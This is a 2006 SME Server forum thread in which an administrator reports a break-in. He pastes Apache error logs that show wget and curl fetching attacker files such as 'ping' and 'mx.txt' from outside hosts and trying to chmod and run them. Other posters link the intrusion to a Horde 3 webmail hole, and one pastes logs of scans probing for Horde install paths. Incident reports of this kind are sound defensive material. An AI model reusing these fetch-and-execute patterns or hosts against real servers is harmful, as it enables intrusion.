Koozali.org: home of the SME Server

Obsolete Releases => SME Server 6.x => Topic started by: Smitro on April 28, 2006, 03:41:41 PM

Title: I've been Hacked.
Post by: Smitro on April 28, 2006, 03:41:41 PM

Hi All,

Just thought I'd share this.

This morning I work up to find both Processors on my server running at 100%. It appeard to be Perl that was causing this. I manage to kill the process but this didn't fix it.

I later tried to shut down my httpd and httpd-e-smith and httpd-admin services and resart them. They Failed to restart.

After looking through logs I came across this in /etc/httpd/logs/error_log

Code: [Select]


--10:56:22--  http://81.58.26.26/libsh/ping.txt
           => ping.txt'
Connecting to 81.58.26.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 358 [text/plain]
ping.txt: Permission denied

Cannot write to ping.txt' (Permission denied).
mv: cannot stat ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory
--10:56:25--  http://81.58.26.26/libsh/ping
           => ping'
Connecting to 81.58.26.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,808 [text/plain]
ping: Permission denied

Cannot write to ping' (Permission denied).
chmod: invalid mode string: x'
sh: ./ping: No such file or directory
  % Total    % Received % Xferd  Average Speed          Time             Curr.
                                 Dload  Upload Total    Current  Left    Speed
^M  0     0    0     0    0     0      0      0 --:--:--  0:00:12 --:--:--     0^M  7 15808    7  1129    0     0     84      0  0:03:07  0:00:$
curl: (23) Failed writing body
chmod: invalid mode string: x'
sh: ./ping: No such file or directory
  % Total    % Received % Xferd  Average Speed          Time             Curr.
                                 Dload  Upload Total    Current  Left    Speed
^M  0     0    0     0    0     0      0      0 --:--:--  0:00:12 --:--:--     0^M100   358  100   358    0     0     26      0  0:00:13  0:00:$

And this further down.

Code: [Select]


--00:50:24--  http://www.gayschorre.de/modules/coppermine/albums/mx.txt
           => mx.txt'
Resolving www.gayschorre.de... done.
Connecting to www.gayschorre.de[217.115.142.114]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20,792 [text/plain]

    0K .......... ..........                                 100%   18.43 KB/s

00:50:27 (18.43 KB/s) - mx.txt' saved [20792/20792]

and this.

Code: [Select]


--06:53:55--  http://crashhk.go.ro/miro
           => miro'
Resolving crashhk.go.ro... done.
Connecting to crashhk.go.ro[81.196.20.134]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21,399 [text/plain]

    0K .......... ..........                                 100%    7.88 KB/s

06:54:01 (7.88 KB/s) - miro' saved [21399/21399]


These were among the usual errors about unable to find robot.txt

I have to admit I am at some fault in this. As my server has  a current up time of 283 days and durring this time I havn't run any updates. (you can't get a good uptime and keep you server up to date).

I'm running SME 6.5.

I am about to resart the server, and perform all updates. I will keep you posted on how it goes.

Title: I've been Hacked.
Post by: boss_hog on April 29, 2006, 03:00:46 PM

Hi Smitro,
first, contact help at this address:
security AT lists.contribs.org
Second, most security issues WILL NOT be discussed in a public forum.
Third, you may have a look at the "gallery" software you were using at the time.
Good luck
Joe

Title: I've been Hacked.
Post by: Smitro on April 29, 2006, 04:02:05 PM

I in no way intended to bring SME down in any way/shape/form. I also mentioned in the above the fact that it was some what self inflicted as I tried to smash a personal record for server up time, and therefore I did not keep up with security patches. I managed to get 283 days (I was hopeing for 365) of uptime, so I personally think that's not something to be sneezed at when talking about how stable SME is.

I realise a public forum is not the best place to discuss something like this... but as most problems on the forum, I was interested in picking other's brains.
Thanks for the email address. I will use it.

The only "Gallery" software I run on the server is software I have writen my self from scrach.

Title: I've been Hacked.
Post by: CharlieBrady on May 01, 2006, 03:58:56 AM

Please see this important article:

http://no.longer.valid/news/article.php?storyid=103

Title: I've been Hacked.
Post by: Smitro on May 01, 2006, 04:06:27 AM

If only I had seen that earlier.  :-?

And I see why, It was only just posted. :-)

Title: I've been Hacked.
Post by: wellsi on May 01, 2006, 12:02:16 PM

Anyone using SME 6.x who has upgraded Webmail to use Horde 3 should read both the news article referred to by Charlie above, and John Bennett's post on Horde 3
"Horde 3.0.9 Security issue" http://forums.contribs.org/index.php?topic=31701.0

This only affects people using the Horde 3 contrib, it does not affect any 'stock' SME 6.x server with official updates applied.

Please remember to report any suspected security issue to security@contribs.org and NOT to the forums.

Ian Wells

Title: I've been Hacked.
Post by: lightman on May 14, 2006, 12:46:57 AM

Damn.

This is not the first time that a hole in the webmail app gives a headache

one of my clients gets hacked too because of this, I didn't saw the post about upgrade horde on time.

I tried to enter control panel to disable it via VPN but no luck, every command that I issued to see what happened hanged up, so I finally turn off the machine (that worked :-D) and tomorrow I will drive there,
and install SME 7

It would be interesting, if a maillist of heavy critical updates could be created (only the ones that put our servers in risk) so we can find out quickly enough :D

I have here the same version 6.0.1 not updated but since I never enable the webmail, I was safe. (kind of, anyway)

well, hope that tomorrow's  mess dont be too big :(

c-u
Lightman

Title: I've been Hacked.
Post by: lightman on May 14, 2006, 01:14:30 AM

Sorry for the double post.

There IS a list of the critical updates called: Updatesannounce
and I was so stupid that I didn't even search for it before post here.

sorry for that.  :-( i'm feel like an idiot.
lightman

Title: Be carefull
Post by: Normando on May 15, 2006, 01:07:09 AM

Code: [Select]

[Sun May 14 19:19:05 2006] [error] [client 85.159.106.36] File does not exist: /home/e-smith/files/ibays/Primary/html/horde2//README
[Sun May 14 19:19:06 2006] [error] [client 85.159.106.36] File does not exist: /home/e-smith/files/ibays/Primary/html/horde3//README
[Sun May 14 19:19:06 2006] [error] [client 85.159.106.36] File does not exist: /home/e-smith/files/ibays/Primary/html/horde-3.0.9//README
[Sun May 14 19:19:07 2006] [error] [client 85.159.106.36] File does not exist: /home/e-smith/files/ibays/Primary/html/Horde//README
[Sun May 14 19:19:08 2006] [error] [client 85.159.106.36] File does not exist: /home/e-smith/files/ibays/Primary/html/projects/horde//README
[Sun May 14 19:19:08 2006] [error] [client 85.159.106.36] File does not exist: /home/e-smith/files/ibays/Primary/html/people/horde//README
[Sun May 14 19:19:09 2006] [error] [client 85.159.106.36] File does not exist: /home/e-smith/files/ibays/Primary/html/imp//README
[Sun May 14 19:19:10 2006] [error] [client 85.159.106.36] File does not exist: /home/e-smith/files/ibays/Primary/html/horde-3.0//README
[Sun May 14 19:19:11 2006] [error] [client 85.159.106.36] File does not exist: /home/e-smith/files/ibays/Primary/html/webmail_horde//README
[Sun May 14 19:19:11 2006] [error] [client 85.159.106.36] File does not exist: /home/e-smith/files/ibays/Primary/html/netmail/horde//README